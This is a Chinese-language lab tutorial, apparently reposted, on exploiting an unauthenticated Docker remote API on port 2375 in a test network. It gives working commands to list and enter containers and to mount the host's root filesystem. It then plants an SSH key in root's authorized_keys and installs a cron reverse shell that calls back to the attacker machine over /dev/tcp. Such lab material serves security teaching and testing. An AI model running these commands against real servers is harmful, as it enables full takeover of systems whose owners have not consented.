漏洞產(chǎn)生原因 (www.hetianlab.com)
如果在docker上配置了遠(yuǎn)程訪問,docker 節(jié)點上會開放一個TCP端口2375,綁定在0.0.0.0上,如果沒有做限制訪問來源的話,攻擊者就可以通過Docker未授權(quán)來控制服務(wù)器。
漏洞影響
攻擊者利用 dockerclient 或者 http 直接請求就可以訪問這個API,可能導(dǎo)致敏感信息泄露,也可以刪除Docker上的數(shù)據(jù)。攻擊者可進(jìn)一步利用Docker自身特性,直接訪問宿主機(jī)上的敏感信息,或?qū)γ舾形募M(jìn)行修改,最終完全控制服務(wù)器。
實驗環(huán)境
目標(biāo)機(jī)器: CentOS7+Docker、IP:10.1.1.200
攻擊機(jī)器:Kali+Docker、IP:10.1.1.100
信息收集
nmap信息收集
發(fā)現(xiàn)開放:
22:ssh默認(rèn)端口
2375:docker遠(yuǎn)程操控
利用2375端口
通過瀏覽器進(jìn)行訪問,如果頁面顯示message ”page not found" 代表存在漏洞,如果頁面顯示空白,可以通過info獲取docker信息
獲取image列表
10.1.1.200:2375/images/json
docker未授權(quán)訪問漏洞利用
docker遠(yuǎn)程連接目標(biāo)機(jī)器
通過docker client使用 -H 參數(shù)連接目標(biāo)的docker,并使用ps-a命令查尋目標(biāo)系統(tǒng)運行的所有容器
docker -H tcp://10.1.1.200 ps -a #列出所有容器
docker -H tcp://10.1.1.200 images #列出所有鏡像
進(jìn)入容器方法一
docker client連接目標(biāo),ps -a 查看哪些容器已經(jīng)停止:
通過strat命令啟動一個停止的容器:
attach 命令連接一個已經(jīng)啟動的容器:
這樣就能夠獲得一個docker容器的shell
進(jìn)入容器方法二
新運行一個容器并將entrypoint設(shè)置為/bin/bash或者/bin/sh,掛載點設(shè)置為服務(wù)器的根目錄掛載至/mnt目錄下(需要root權(quán)限啟動docker)
docker -H tcp://10.1.1.200 run -it -v /:/mnt --entrypoint /bin/bash 4c9608fd76ba(鏡像id)
docker未授權(quán)寫ssh公鑰獲得shell
啟動一個容器,掛載宿主機(jī)的/mnt目錄(上一步驟已掛載),之后將攻擊者的ssh公鑰~/.ssh/id_rsa.pub的內(nèi)容寫到入宿主機(jī)的/root/.ssh/authorized_keys文件中,之后就可以用root賬戶直接登錄了
首先kali生成id_rsa公鑰:ssh-keygen -t rsa
生成的公鑰在/root/.ssh/ 目錄下:
將生成公鑰寫入到目標(biāo)/root/.ssh/authorized_keys文件中:
>這個代表的意思為覆蓋,>>代表為追加
此處的路徑為之前所掛載的路徑,如果掛載root路徑那就為/root/root/.ssh
通過ssh進(jìn)行連接,獲取宿主機(jī)的shell
docker未授權(quán)寫定時任務(wù)獲得shell
啟動一個容器,掛載宿主機(jī)的目錄(此前已掛載),之后將反彈shell的腳本寫入到
/etc/crontab
中,攻擊機(jī)nc -lvvp port
會得到一個反彈的shell。
將反彈shell的腳本寫入到/var/spool/cron/root(centos系統(tǒng))或/var/spool/cron/crontabs/root(ubuntu系統(tǒng))
kali開啟監(jiān)聽:
寫入反彈shell的腳本
****為定時任務(wù),此處為每分鐘執(zhí)行一次 /bin/bash -i >& /dev/tcp/10.1.1.100/1212 0>&1
文章來源:http://www.zghlxwxcb.cn/news/detail-667180.html
文章來源地址http://www.zghlxwxcb.cn/news/detail-667180.html
到了這里,關(guān)于Docker未授權(quán)訪問漏洞的文章就介紹完了。如果您還想了解更多內(nèi)容,請在右上角搜索TOY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!